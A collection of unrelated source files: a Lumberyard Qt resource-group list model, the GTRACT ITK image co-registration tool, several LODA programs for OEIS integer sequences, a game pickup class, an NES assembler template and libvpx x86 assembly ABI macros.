* or, if provided, by the license below or the license accompanying this file. Do not
* remove or modify any license notices. This file is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
*
*/
#include "stdafx.h"
#include <IAWSResourceManager.h>
#include <DeploymentStatusModel.h>
#include <ResourceGroupListStatusModel.h>
#include <AWSUtil.h>
#include <ResourceGroupListStatusModel.moc>
// Builds the list model with the resource-group column set, allocates a
// request id for async resource-manager calls, and forwards the manager's
// ActiveDeploymentChanged notifications.
ResourceGroupListStatusModel::ResourceGroupListStatusModel(AWSResourceManager* resourceManager)
    : StackStatusListModel{resourceManager, ColumnCount}
    , m_requestId{resourceManager->AllocateRequestId()}
{
    setHorizontalHeaderItem(NameColumn, new QStandardItem {"Resource group"});
    connect(resourceManager, &AWSResourceManager::ActiveDeploymentChanged, this, &ResourceGroupListStatusModel::ActiveDeploymentChanged);
}
// Refreshes the resource group list. Unless |force| is set, the refresh is
// rate-limited by IsRefreshTime().
void ResourceGroupListStatusModel::Refresh(bool force)
{
    if (force || IsRefreshTime())
    {
        StackStatusListModel::Refresh(force);
        m_resourceManager->RefreshResourceGroupList();
    }
}
// Handles the resource-group-list response: the payload is a map whose
// "ResourceGroups" entry holds the per-group status list.
void ResourceGroupListStatusModel::ProcessOutputResourceGroupList(const QVariant& value)
{
    auto map = value.toMap();
    ProcessStatusList(map["ResourceGroups"]);
}
// Fills one table row from the status map for a resource group. Base
// columns are handled by StackStatusListModel; this override adds the
// group-specific columns. Missing values are rendered as "--".
void ResourceGroupListStatusModel::UpdateRow(const QList<QStandardItem*>& row, const QVariantMap& map)
{
    StackStatusListModel::UpdateRow(row, map);
    row[NameColumn]->setText(map["Name"].toString());
    auto resourceStatus = map["ResourceStatus"].toString();
    if (resourceStatus.isEmpty())
    {
        row[ResourceStatusColumn]->setText(AWSUtil::MakePrettyResourceStatusText("--"));
    }
    else
    {
        // Status text plus a tooltip carrying the reason and a status color.
        row[ResourceStatusColumn]->setText(AWSUtil::MakePrettyResourceStatusText(resourceStatus));
        row[ResourceStatusColumn]->setData(AWSUtil::MakePrettyResourceStatusTooltip(resourceStatus, map["ResourceStatusReason"].toString()), Qt::ToolTipRole);
        row[ResourceStatusColumn]->setData(AWSUtil::MakePrettyResourceStatusColor(resourceStatus), Qt::ForegroundRole);
    }
    // Timestamps are shown in local time.
    auto timestamp = map["Timestamp"].toDateTime().toLocalTime().toString();
    if (timestamp.isEmpty())
    {
        timestamp = "--";
    }
    row[TimestampColumn]->setText(timestamp);
    auto id = map["PhysicalResourceId"].toString();
    if (id.isEmpty())
    {
        row[PhysicalResourceIdColumn]->setText("--");
    }
    else
    {
        // Long physical ids are abbreviated; the full id goes in the tooltip.
        row[PhysicalResourceIdColumn]->setText(AWSUtil::MakeShortResourceId(id));
        row[PhysicalResourceIdColumn]->setData(id, Qt::ToolTipRole);
    }
    row[ResourceGroupTemplateFilePathColumn]->setText(map["ResourceGroupTemplateFilePath"].toString());
    row[LambdaFunctionCodeDirectoryPathColumn]->setText(map["LambdaFunctionCodeDirectoryPath"].toString());
}
// Returns the status model for the currently active deployment, upcast to
// the IDeploymentStatusModel interface.
QSharedPointer<IDeploymentStatusModel> ResourceGroupListStatusModel::GetActiveDeploymentStatusModel() const
{
    return m_resourceManager->GetActiveDeploymentStatusModel().staticCast<IDeploymentStatusModel>();
}
// The methods below supply the static, translatable UI text for the
// resource group view; update-button text/tooltip are delegated to the
// active deployment's status model.
QString ResourceGroupListStatusModel::GetMainTitleText() const
{
    return tr("Resource groups");
}

QString ResourceGroupListStatusModel::GetMainMessageText() const
{
    return tr(
        "Resource groups are used to define the AWS resources you will use in your game. "
        "Each resource group represents a single game feature, such as a high score system. "
        "The resources will be created in the cloud as part of a deployment. "
        "Each deployment is an independent copy of the resources defined in the project's resource groups."
    );
}

QString ResourceGroupListStatusModel::GetListTitleText() const
{
    return tr("Resource group status");
}

QString ResourceGroupListStatusModel::GetListMessageText() const
{
    return tr(
        "This table shows the current status of the resource groups that have been added to the Lumberyard project."
    );
}

QString ResourceGroupListStatusModel::GetUpdateButtonText() const
{
    return GetActiveDeploymentStatusModel()->GetUpdateButtonText();
}

QString ResourceGroupListStatusModel::GetUpdateButtonToolTip() const
{
    return GetActiveDeploymentStatusModel()->GetUpdateButtonToolTip();
}

QString ResourceGroupListStatusModel::GetAddButtonText() const
{
    return tr("Add resource group");
}

QString ResourceGroupListStatusModel::GetAddButtonToolTip() const
{
    return tr("Add a new resource group to the Lumberyard project.");
}
|
/*=========================================================================
*
* Copyright SINAPSE: Scalable Informatics for Neuroscience, Processing and Software Engineering
* The University of Iowa
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0.txt
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
*=========================================================================*/
/*=========================================================================
Program: GTRACT (Guided Tensor Restore Anatomical Connectivity Tractography)
Module: $RCSfile: $
Language: C++
Date: $Date: 2010/05/03 14:53:40 $
Version: $Revision: 1.9 $
Copyright (c) University of Iowa Department of Radiology. All rights reserved.
See GTRACT-Copyright.txt or http://mri.radiology.uiowa.edu/copyright/GTRACT-Copyright.txt
for details.
This software is distributed WITHOUT ANY WARRANTY; without even
the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
PURPOSE. See the above copyright notices for more information.
=========================================================================*/
#include <iostream>
#include <fstream>
#include <itkImage.h>
#include <itkVectorIndexSelectionCastImageFilter.h>
#include <itkThresholdImageFilter.h>
#include <itkOrientImageFilter.h>
#include <itkCompositeTransform.h>
#include <itkTransform.h>
#include "itkGtractImageIO.h"
#include "BRAINSFitHelper.h"
#include "gtractCoRegAnatomyCLP.h"
#include "BRAINSThreadControl.h"
#include "DWIConvertLib.h"
int
main(int argc, char * argv[])
{
PARSE_ARGS;
BRAINSRegisterAlternateIO();
const BRAINSUtils::StackPushITKDefaultNumberOfThreads TempDefaultNumberOfThreadsHolder(numberOfThreads);
std::vector<int> GridSize;
GridSize.push_back(gridSize[0]);
GridSize.push_back(gridSize[1]);
GridSize.push_back(gridSize[2]);
bool debug = true;
if (debug)
{
std::cout << "=====================================================" << std::endl;
std::cout << "Input Image: " << inputVolume << std::endl;
std::cout << "Output Transform: " << outputTransformName << std::endl;
std::cout << "Anatomical Image: " << inputAnatomicalVolume << std::endl;
std::cout << "Iterations: " << numberOfIterations << std::endl;
if (transformType == "Bspline")
{
std::cout << "Input Rigid Transform: " << inputRigidTransform << std::endl;
// std::cout << "Grid Size: " << GridSize <<std::endl;
// std::cout << "Border Size: " << borderSize <<std::endl;
// std::cout << "Corrections: " << numberOfCorrections <<std::endl;
// std::cout << "Evaluations: " << numberOfEvaluations <<std::endl;
std::cout << "Histogram: " << numberOfHistogramBins << std::endl;
std::cout << "Scale: " << spatialScale << std::endl;
std::cout << "Convergence: " << convergence << std::endl;
std::cout << "Gradient Tolerance: " << gradientTolerance << std::endl;
std::cout << "Index: " << vectorIndex << std::endl;
}
else if (transformType == "Rigid")
{
std::cout << "Translation Scale: " << translationScale << std::endl;
std::cout << "Maximum Step Length: " << maximumStepSize << std::endl;
std::cout << "Minimum Step Length: " << minimumStepSize << std::endl;
std::cout << "Relaxation Factor: " << relaxationFactor << std::endl;
std::cout << "Samples: " << numberOfSamples << std::endl;
std::cout << "Index: " << vectorIndex << std::endl;
}
// std::cout << "Bound X: " << boundX <<std::endl;
// std::cout << "\tLower X Bound: " << xLowerBound <<std::endl;
// std::cout << "\tUpper X Bound: " << xUpperBound <<std::endl;
// std::cout << "Bound Y: " << boundY <<std::endl;
// std::cout << "\tLower Y Bound: " << yLowerBound <<std::endl;
// std::cout << "\tUpper Y Bound: " << yUpperBound <<std::endl;
// std::cout << "Bound Z: " << boundZ <<std::endl;
// std::cout << "\tLower Z Bound: " << zLowerBound <<std::endl;
// std::cout << "\tUpper Z Bound: " << zUpperBound <<std::endl;
std::cout << "=====================================================" << std::endl;
}
bool violated = false;
if (inputVolume.empty())
{
violated = true;
std::cout << " --inputVolume Required! " << std::endl;
}
if (inputAnatomicalVolume.empty())
{
violated = true;
std::cout << " --inputAnatomicalVolume Required! " << std::endl;
}
if (transformType == "Bspline")
{
if (inputRigidTransform.empty())
{
violated = true;
std::cout << " --inputRigidTransform Required! " << std::endl;
}
}
if (outputTransformName.empty())
{
violated = true;
std::cout << " --outputTransform Required! " << std::endl;
}
if (violated)
{
return EXIT_FAILURE;
}
std::string convertedVolume;
if (convertInputVolumeToNrrdOrNifti("Nrrd", inputVolume, convertedVolume))
{
inputVolume = convertedVolume;
}
else
{
std::cout << "Error: DWI Convert can not read inputVolume." << std::endl;
return -1;
}
// using PixelType = signed short;
using PixelType = float;
using VectorImageType = itk::VectorImage<PixelType, 3>;
using VectorImageReaderType = itk::ImageFileReader<VectorImageType, itk::DefaultConvertPixelTraits<PixelType>>;
VectorImageReaderType::Pointer vectorImageReader = VectorImageReaderType::New();
vectorImageReader->SetFileName(inputVolume);
try
{
vectorImageReader->Update();
}
catch (itk::ExceptionObject & ex)
{
std::cout << ex << std::endl;
throw;
}
using AnatomicalImageType = itk::Image<PixelType, 3>;
using AnatomicalImageReaderType = itk::ImageFileReader<AnatomicalImageType>;
AnatomicalImageReaderType::Pointer anatomicalReader = AnatomicalImageReaderType::New();
anatomicalReader->SetFileName(inputAnatomicalVolume);
try
{
anatomicalReader->Update();
}
catch (itk::ExceptionObject & ex)
{
std::cout << ex << std::endl;
throw;
}
/* Extract the Vector Image Index for Registration */
using VectorSelectFilterType = itk::VectorIndexSelectionCastImageFilter<VectorImageType, AnatomicalImageType>;
using VectorSelectFilterPointer = VectorSelectFilterType::Pointer;
VectorSelectFilterPointer selectIndexImageFilter = VectorSelectFilterType::New();
selectIndexImageFilter->SetIndex(vectorIndex);
selectIndexImageFilter->SetInput(vectorImageReader->GetOutput());
try
{
selectIndexImageFilter->Update();
}
catch (itk::ExceptionObject & e)
{
std::cout << e << std::endl;
throw;
}
std::string localInitializeTransformMode = "Off";
if (((useCenterOfHeadAlign == true) + (useGeometryAlign == true) + (useMomentsAlign == true)) > 1)
{
std::cout << "ERROR: Can only specify one of [useCenterOfHeadAlign | useGeometryAlign | useMomentsAlign ]"
<< std::endl;
}
if (useCenterOfHeadAlign == true)
{
localInitializeTransformMode = "useCenterOfHeadAlign";
}
if (useGeometryAlign == true)
{
localInitializeTransformMode = "useGeometryAlign";
}
if (useMomentsAlign == true)
{
localInitializeTransformMode = "useMomentsAlign";
}
using RegisterFilterType = itk::BRAINSFitHelper;
RegisterFilterType::Pointer registerImageFilter = RegisterFilterType::New();
if (transformType == "Rigid")
{
/* The Threshold Image Filter is used to produce the brain clipping mask. */
using ThresholdFilterType = itk::ThresholdImageFilter<AnatomicalImageType>;
constexpr PixelType imageThresholdBelow = 100;
ThresholdFilterType::Pointer brainOnlyFilter = ThresholdFilterType::New();
brainOnlyFilter->SetInput(selectIndexImageFilter->GetOutput());
brainOnlyFilter->ThresholdBelow(imageThresholdBelow);
try
{
brainOnlyFilter->Update();
}
catch (itk::ExceptionObject & e)
{
std::cout << e << std::endl;
throw;
}
registerImageFilter->SetMovingVolume(brainOnlyFilter->GetOutput());
}
if (transformType == "Bspline")
{
using OrientFilterType = itk::OrientImageFilter<AnatomicalImageType, AnatomicalImageType>;
OrientFilterType::Pointer orientImageFilter = OrientFilterType::New();
// orientImageFilter->SetInput(brainOnlyFilter->GetOutput() );
orientImageFilter->SetInput(selectIndexImageFilter->GetOutput());
orientImageFilter->SetDesiredCoordinateDirection(anatomicalReader->GetOutput()->GetDirection());
orientImageFilter->UseImageDirectionOn();
try
{
orientImageFilter->Update();
}
catch (itk::ExceptionObject & e)
{
std::cout << e << std::endl;
throw;
}
registerImageFilter->SetMovingVolume(orientImageFilter->GetOutput());
}
std::vector<std::string> transformTypes;
std::vector<int> iterations;
iterations.push_back(numberOfIterations);
using TransformType = itk::Transform<double, 3, 3>;
using CompositeTransformType = itk::CompositeTransform<double, 3>;
if (transformType == "Bspline")
{
transformTypes.emplace_back("BSpline");
registerImageFilter->SetSamplingPercentage(1.0 / spatialScale);
registerImageFilter->SetNumberOfHistogramBins(numberOfHistogramBins);
registerImageFilter->SetSplineGridSize(gridSize);
registerImageFilter->SetCostFunctionConvergenceFactor(convergence);
registerImageFilter->SetProjectedGradientTolerance(gradientTolerance);
registerImageFilter->SetMaxBSplineDisplacement(maxBSplineDisplacement);
registerImageFilter->SetInitializeTransformMode(localInitializeTransformMode);
if (!inputRigidTransform.empty())
{
TransformType::Pointer inputTransform = itk::ReadTransformFromDisk(inputRigidTransform);
CompositeTransformType::Pointer inputCompositeTransform =
dynamic_cast<CompositeTransformType *>(inputTransform.GetPointer());
if (inputCompositeTransform.IsNull())
{
inputCompositeTransform = CompositeTransformType::New();
inputCompositeTransform->AddTransform(inputTransform);
}
registerImageFilter->SetCurrentGenericTransform(inputCompositeTransform);
}
}
if (transformType == "Rigid")
{
transformTypes.emplace_back("ScaleVersor3D");
std::vector<double> minStepLength;
minStepLength.push_back((double)minimumStepSize);
registerImageFilter->SetTranslationScale(translationScale);
registerImageFilter->SetMaximumStepLength(maximumStepSize);
registerImageFilter->SetMinimumStepLength(minStepLength);
registerImageFilter->SetRelaxationFactor(relaxationFactor);
if (numberOfSamples > 0)
{
const unsigned long numberOfAllSamples = anatomicalReader->GetOutput()->GetBufferedRegion().GetNumberOfPixels();
samplingPercentage = static_cast<double>(numberOfSamples) / numberOfAllSamples;
std::cout << "WARNING --numberOfSamples is deprecated, please use --samplingPercentage instead " << std::endl;
std::cout << "WARNING: Replacing command line --samplingPercentage " << samplingPercentage << std::endl;
}
registerImageFilter->SetSamplingPercentage(samplingPercentage);
registerImageFilter->SetInitializeTransformMode(localInitializeTransformMode);
}
registerImageFilter->SetFixedVolume(anatomicalReader->GetOutput());
registerImageFilter->SetTransformType(transformTypes);
registerImageFilter->SetNumberOfIterations(iterations);
try
{
registerImageFilter->Update();
}
catch (itk::ExceptionObject & ex)
{
std::cout << ex << std::endl;
throw;
}
using GenericTransformType = itk::Transform<double, 3, 3>;
GenericTransformType::Pointer outputTransform = registerImageFilter->GetCurrentGenericTransform()->GetNthTransform(0);
itk::WriteTransformToDisk<double>(outputTransform, outputTransformName);
return EXIT_SUCCESS;
}
|
; A316867: Number of times 6 appears in decimal expansion of n.
; 0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,1,1,1,1,1,1,2,1,1,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0
mov $1,6 ; seed the counter with 6; the matching "sub $1,6" below removes it again
lpb $0 ; loop while $0 > 0, peeling one decimal digit per pass
mov $2,$0
div $0,10 ; drop the last digit of n
mod $2,10 ; $2 = last digit of n
cmp $2,6 ; $2 := 1 if the digit equals 6, else 0
add $1,$2 ; accumulate the count
lpe
sub $1,6 ; cancel the seed offset
mov $0,$1 ; result in $0
|
#include "App.h"
#include "Render.h"
#include "KnightHelmet.h"
// Selects this pickup's sprite rectangle inside the shared texture atlas.
// Always reports success.
bool KnightHelmet::Load()
{
    atlasSection = { 96, 225, 32, 32 }; // x, y, w, h within the atlas (pixels)
    return true;
}
// Renders the helmet sprite at its world position using the atlas section
// chosen in Load(). `showColliders` is accepted for interface consistency
// but unused here — this object draws no debug collider.
void KnightHelmet::Draw(bool showColliders)
{
    app->render->DrawTexture(texture, bounds.x, bounds.y, &atlasSection);
}
// Serializes the helmet's state under XML node `n`: position/size, the
// object and armor type tags (stored as ints), and the owning map name.
// Always reports success.
bool KnightHelmet::SaveState(pugi::xml_node& n)
{
    pugi::xml_node node = n.append_child("position");
    node.append_attribute("x").set_value(bounds.x);
    node.append_attribute("y").set_value(bounds.y);
    node.append_attribute("w").set_value(bounds.w);
    node.append_attribute("h").set_value(bounds.h);
    node = n.append_child("object_type");
    node.append_attribute("value").set_value((int)objectType);
    node = n.append_child("armor_type");
    node.append_attribute("value").set_value((int)armorType);
    node = n.append_child("map_name");
    node.append_attribute("value").set_value(mapName.c_str()); // restored on load to re-place the object
    return true;
}
;----------------------------------------------------------------
; constants
;----------------------------------------------------------------
PRG_COUNT = 1 ;1 = 16KB, 2 = 32KB
MIRRORING = %0001 ;%0000 = horizontal, %0001 = vertical, %1000 = four-screen
;----------------------------------------------------------------
; variables
;----------------------------------------------------------------
.enum $0000
;NOTE: declare variables using the DSB and DSW directives, like this:
;MyVariable0 .dsb 1
;MyVariable1 .dsb 3
.ende
;NOTE: you can also split the variable declarations into individual pages, like this:
;.enum $0100
;.ende
;.enum $0200
;.ende
;----------------------------------------------------------------
; iNES header
;----------------------------------------------------------------
.db "NES", $1a ;identification of the iNES header
.db PRG_COUNT ;number of 16KB PRG-ROM pages
.db $01 ;number of 8KB CHR-ROM pages
.db $00|MIRRORING ;mapper 0 and mirroring
.dsb 9, $00 ;clear the remaining bytes
;(the header is 16 bytes in total: "NES"+$1a, 3 config bytes, 9 padding bytes)
;----------------------------------------------------------------
; program bank(s)
;----------------------------------------------------------------
.base $10000-(PRG_COUNT*$4000) ;place code so it ends at the top of CPU address space
Reset:
;NOTE: initialization code goes here
;NOTE(review): with all three stubs empty, Reset currently falls straight
;through NMI into IRQ — fill in the handlers (or add rti/jmp) before use.
NMI:
;NOTE: NMI code goes here
IRQ:
;NOTE: IRQ code goes here
;----------------------------------------------------------------
; interrupt vectors
;----------------------------------------------------------------
.org $fffa
.dw NMI
.dw Reset
.dw IRQ
;----------------------------------------------------------------
; CHR-ROM bank
;----------------------------------------------------------------
.incbin "tiles.chr"
|
; A031368: Odd-indexed primes: a(n) = prime(2n-1).
; 2,5,11,17,23,31,41,47,59,67,73,83,97,103,109,127,137,149,157,167,179,191,197,211,227,233,241,257,269,277,283,307,313,331,347,353,367,379,389,401,419,431,439,449,461,467,487,499,509,523,547,563,571,587,599,607,617,631,643,653,661,677,691,709,727,739,751,761,773,797,811,823,829,853,859,877,883,907,919,937,947,967,977,991,1009,1019,1031,1039,1051,1063,1087,1093,1103,1117,1129,1153,1171,1187,1201,1217
mul $0,2 ; map index n -> 2n
seq $0,6005 ; The odd prime numbers together with 1.
max $0,2 ; A006005 starts at 1; clamp so the first term is prime(1) = 2 — presumably an offset fix, TODO confirm
|
; A095248: a(n) = least k > 0 such that n-th partial sum is divisible by n if and only if n is not prime.
; 1,2,1,4,1,3,1,3,2,2,1,3,1,3,2,2,1,3,1,3,2,2,1,3,2,2,2,2,1,3,1,3,2,2,2,2,1,3,2,2,1,3,1,3,2,2,1,3,2,2,2,2,1,3,2,2,2,2,1,3,1,3,2,2,2,2,1,3,2,2,1,3,1,3,2,2,2,2,1,3,2,2,1,3,2,2,2,2,1,3,2,2,2,2,2,2,1,3,2,2,1,3,1,3,2,2,1,3,1,3,2,2,1,3,2,2,2,2,2,2,2,2,2,2,2,2,1,3,2,2,1,3,2,2,2,2,1,3,1,3,2,2,2,2,2,2,2,2,1,3,1,3,2,2,2,2,1,3,2,2,2,2,1,3,2,2,1,3,2,2,2,2,1,3,2,2,2,2,1,3,1,3,2,2,2,2,2,2,2,2,1,3,1,3,2,2,1,3,1,3,2,2,2,2,2,2,2,2,2,2,1,3,2,2,2,2,2,2,2,2,2,2,1,3,2,2,1,3,1,3,2,2,1,3,2,2,2,2,1,3,1,3,2,2,2,2,2,2,2,2
; NOTE(review): machine-generated LODA program; the nested lpb/lpe pairs
; emulate memoized recursion over the helper sequence called below.
; Left byte-identical apart from comments — do not hand-edit the control flow.
mov $31,$0
mov $33,2
lpb $33,1
mov $0,$31
sub $33,1
add $0,$33
sub $0,1
mov $27,$0
mov $29,2
lpb $29,1
clr $0,27
mov $0,$27
sub $29,1
add $0,$29
sub $0,1
cal $0,333996 ; Number of composite numbers in the triangular n X n multiplication table.
add $3,2
mov $5,$0
mul $0,2
mov $26,$5
cmp $26,0
add $5,$26
mod $3,$5
lpb $5,1
sub $0,$3
div $0,2
mov $5,$3
lpe
mov $1,$0
mov $30,$29
lpb $30,1
mov $28,$1
sub $30,1
lpe
lpe
lpb $27,1
mov $27,0
sub $28,$1
lpe
mov $1,$28
mov $34,$33
lpb $34,1
mov $32,$1
sub $34,1
lpe
lpe
lpb $31,1
mov $31,0
sub $32,$1
lpe
mov $1,$32
add $1,1
|
;
; Copyright (c) 2010 The WebM project authors. All Rights Reserved.
;
; Use of this source code is governed by a BSD-style license
; that can be found in the LICENSE file in the root of the source
; tree. An additional intellectual property rights grant can be found
; in the file PATENTS. All contributing project authors may
; be found in the AUTHORS file in the root of the source tree.
;
%include "vpx_config.asm"
; 32/64 bit compatibility macros
;
; In general, we make the source use 64 bit syntax, then twiddle with it using
; the preprocessor to get the 32 bit syntax on 32 bit platforms.
;
%ifidn __OUTPUT_FORMAT__,elf32
%define ABI_IS_32BIT 1
%elifidn __OUTPUT_FORMAT__,macho32
%define ABI_IS_32BIT 1
%elifidn __OUTPUT_FORMAT__,win32
%define ABI_IS_32BIT 1
%elifidn __OUTPUT_FORMAT__,aout
%define ABI_IS_32BIT 1
%else
%define ABI_IS_32BIT 0
%endif
%if ABI_IS_32BIT
%define rax eax
%define rbx ebx
%define rcx ecx
%define rdx edx
%define rsi esi
%define rdi edi
%define rsp esp
%define rbp ebp
%define movsxd mov
%macro movq 2
%ifidn %1,eax
movd %1,%2
%elifidn %2,eax
movd %1,%2
%elifidn %1,ebx
movd %1,%2
%elifidn %2,ebx
movd %1,%2
%elifidn %1,ecx
movd %1,%2
%elifidn %2,ecx
movd %1,%2
%elifidn %1,edx
movd %1,%2
%elifidn %2,edx
movd %1,%2
%elifidn %1,esi
movd %1,%2
%elifidn %2,esi
movd %1,%2
%elifidn %1,edi
movd %1,%2
%elifidn %2,edi
movd %1,%2
%elifidn %1,esp
movd %1,%2
%elifidn %2,esp
movd %1,%2
%elifidn %1,ebp
movd %1,%2
%elifidn %2,ebp
movd %1,%2
%else
movq %1,%2
%endif
%endmacro
%endif
; LIBVPX_YASM_WIN64
; Set LIBVPX_YASM_WIN64 if output is Windows 64bit so the code will work if x64
; or win64 is defined on the Yasm command line.
%ifidn __OUTPUT_FORMAT__,win64
%define LIBVPX_YASM_WIN64 1
%elifidn __OUTPUT_FORMAT__,x64
%define LIBVPX_YASM_WIN64 1
%else
%define LIBVPX_YASM_WIN64 0
%endif
; sym()
; Return the proper symbol name for the target ABI.
;
; Certain ABIs, notably MS COFF and Darwin MACH-O, require that symbols
; with C linkage be prefixed with an underscore.
;
%ifidn __OUTPUT_FORMAT__,elf32
%define sym(x) x
%elifidn __OUTPUT_FORMAT__,elf64
%define sym(x) x
%elifidn __OUTPUT_FORMAT__,elfx32
%define sym(x) x
%elif LIBVPX_YASM_WIN64
%define sym(x) x
%else
%define sym(x) _ %+ x
%endif
; PRIVATE
; Macro for the attribute to hide a global symbol for the target ABI.
; This is only active if CHROMIUM is defined.
;
; Chromium doesn't like exported global symbols due to symbol clashing with
; plugins among other things.
;
; Requires Chromium's patched copy of yasm:
; http://src.chromium.org/viewvc/chrome?view=rev&revision=73761
; http://www.tortall.net/projects/yasm/ticket/236
;
%ifdef CHROMIUM
%ifidn __OUTPUT_FORMAT__,elf32
%define PRIVATE :hidden
%elifidn __OUTPUT_FORMAT__,elf64
%define PRIVATE :hidden
%elifidn __OUTPUT_FORMAT__,elfx32
%define PRIVATE :hidden
%elif LIBVPX_YASM_WIN64
%define PRIVATE
%else
%define PRIVATE :private_extern
%endif
%else
%define PRIVATE
%endif
; arg()
; Return the address specification of the given argument
;
%if ABI_IS_32BIT
%define arg(x) [ebp+8+4*x]
%else
; 64 bit ABI passes arguments in registers. This is a workaround to get up
; and running quickly. Relies on SHADOW_ARGS_TO_STACK
%if LIBVPX_YASM_WIN64
%define arg(x) [rbp+16+8*x]
%else
%define arg(x) [rbp-8-8*x]
%endif
%endif
; REG_SZ_BYTES, REG_SZ_BITS
; Size of a register
%if ABI_IS_32BIT
%define REG_SZ_BYTES 4
%define REG_SZ_BITS 32
%else
%define REG_SZ_BYTES 8
%define REG_SZ_BITS 64
%endif
; ALIGN_STACK <alignment> <register>
; This macro aligns the stack to the given alignment (in bytes). The stack
; is left such that the previous value of the stack pointer is the first
; argument on the stack (ie, the inverse of this macro is 'pop rsp.')
; This macro uses one temporary register, which is not preserved, and thus
; must be specified as an argument.
%macro ALIGN_STACK 2
    mov %2, rsp ; remember the original stack pointer in the caller-supplied scratch register
    and rsp, -%1 ; round rsp down to a multiple of the requested alignment
    lea rsp, [rsp - (%1 - REG_SZ_BYTES)] ; leave room so the push below lands exactly on the boundary
    push %2 ; the saved rsp becomes the first item on the aligned stack (undo with 'pop rsp')
%endmacro
;
; The Microsoft assembler tries to impose a certain amount of type safety in
; its register usage. YASM doesn't recognize these directives, so we just
; %define them away to maintain as much compatibility as possible with the
; original inline assembler we're porting from.
;
%idefine PTR
%idefine XMMWORD
%idefine MMWORD
; PIC macros
;
%if ABI_IS_32BIT
%if CONFIG_PIC=1
%ifidn __OUTPUT_FORMAT__,elf32
%define GET_GOT_SAVE_ARG 1
%define WRT_PLT wrt ..plt
%macro GET_GOT 1
extern _GLOBAL_OFFSET_TABLE_
push %1
call %%get_got
%%sub_offset:
jmp %%exitGG
%%get_got:
mov %1, [esp]
add %1, _GLOBAL_OFFSET_TABLE_ + $$ - %%sub_offset wrt ..gotpc
ret
%%exitGG:
%undef GLOBAL
%define GLOBAL(x) x + %1 wrt ..gotoff
%undef RESTORE_GOT
%define RESTORE_GOT pop %1
%endmacro
%elifidn __OUTPUT_FORMAT__,macho32
%define GET_GOT_SAVE_ARG 1
%macro GET_GOT 1
push %1
call %%get_got
%%get_got:
pop %1
%undef GLOBAL
%define GLOBAL(x) x + %1 - %%get_got
%undef RESTORE_GOT
%define RESTORE_GOT pop %1
%endmacro
%endif
%endif
%ifdef CHROMIUM
%ifidn __OUTPUT_FORMAT__,macho32
%define HIDDEN_DATA(x) x:private_extern
%else
%define HIDDEN_DATA(x) x
%endif
%else
%define HIDDEN_DATA(x) x
%endif
%else
%macro GET_GOT 1
%endmacro
%define GLOBAL(x) rel x
%ifidn __OUTPUT_FORMAT__,elf64
%define WRT_PLT wrt ..plt
%define HIDDEN_DATA(x) x:data hidden
%elifidn __OUTPUT_FORMAT__,elfx32
%define WRT_PLT wrt ..plt
%define HIDDEN_DATA(x) x:data hidden
%elifidn __OUTPUT_FORMAT__,macho64
%ifdef CHROMIUM
%define HIDDEN_DATA(x) x:private_extern
%else
%define HIDDEN_DATA(x) x
%endif
%else
%define HIDDEN_DATA(x) x
%endif
%endif
%ifnmacro GET_GOT
%macro GET_GOT 1
%endmacro
%define GLOBAL(x) x
%endif
%ifndef RESTORE_GOT
%define RESTORE_GOT
%endif
%ifndef WRT_PLT
%define WRT_PLT
%endif
%if ABI_IS_32BIT
%macro SHADOW_ARGS_TO_STACK 1
%endm
%define UNSHADOW_ARGS
%else
%if LIBVPX_YASM_WIN64
%macro SHADOW_ARGS_TO_STACK 1 ; argc
%if %1 > 0
mov arg(0),rcx
%endif
%if %1 > 1
mov arg(1),rdx
%endif
%if %1 > 2
mov arg(2),r8
%endif
%if %1 > 3
mov arg(3),r9
%endif
%endm
%else
%macro SHADOW_ARGS_TO_STACK 1 ; argc
%if %1 > 0
push rdi
%endif
%if %1 > 1
push rsi
%endif
%if %1 > 2
push rdx
%endif
%if %1 > 3
push rcx
%endif
%if %1 > 4
push r8
%endif
%if %1 > 5
push r9
%endif
%if %1 > 6
%assign i %1-6
%assign off 16
%rep i
mov rax,[rbp+off]
push rax
%assign off off+8
%endrep
%endif
%endm
%endif
%define UNSHADOW_ARGS mov rsp, rbp
%endif
; Win64 ABI requires that XMM6:XMM15 are callee saved
; SAVE_XMM n, [u]
; store registers 6-n on the stack
; if u is specified, use unaligned movs.
; Win64 ABI requires 16 byte stack alignment, but then pushes an 8 byte return
; value. Typically we follow this up with 'push rbp' - re-aligning the stack -
; but in some cases this is not done and unaligned movs must be used.
%if LIBVPX_YASM_WIN64
%macro SAVE_XMM 1-2 a
%if %1 < 6
%error Only xmm registers 6-15 must be preserved
%else
%assign last_xmm %1
%define movxmm movdq %+ %2
%assign xmm_stack_space ((last_xmm - 5) * 16)
sub rsp, xmm_stack_space
%assign i 6
%rep (last_xmm - 5)
movxmm [rsp + ((i - 6) * 16)], xmm %+ i
%assign i i+1
%endrep
%endif
%endmacro
%macro RESTORE_XMM 0
%ifndef last_xmm
%error RESTORE_XMM must be paired with SAVE_XMM n
%else
%assign i last_xmm
%rep (last_xmm - 5)
movxmm xmm %+ i, [rsp +((i - 6) * 16)]
%assign i i-1
%endrep
add rsp, xmm_stack_space
; there are a couple functions which return from multiple places.
; otherwise, we could uncomment these:
; %undef last_xmm
; %undef xmm_stack_space
; %undef movxmm
%endif
%endmacro
%else
%macro SAVE_XMM 1-2
%endmacro
%macro RESTORE_XMM 0
%endmacro
%endif
; Name of the rodata section
;
; .rodata seems to be an elf-ism, as it doesn't work on OSX.
;
%ifidn __OUTPUT_FORMAT__,macho64
%define SECTION_RODATA section .text
%elifidn __OUTPUT_FORMAT__,macho32
%macro SECTION_RODATA 0
section .text
%endmacro
%elifidn __OUTPUT_FORMAT__,aout
%define SECTION_RODATA section .data
%else
%define SECTION_RODATA section .rodata
%endif
; Tell GNU ld that we don't require an executable stack.
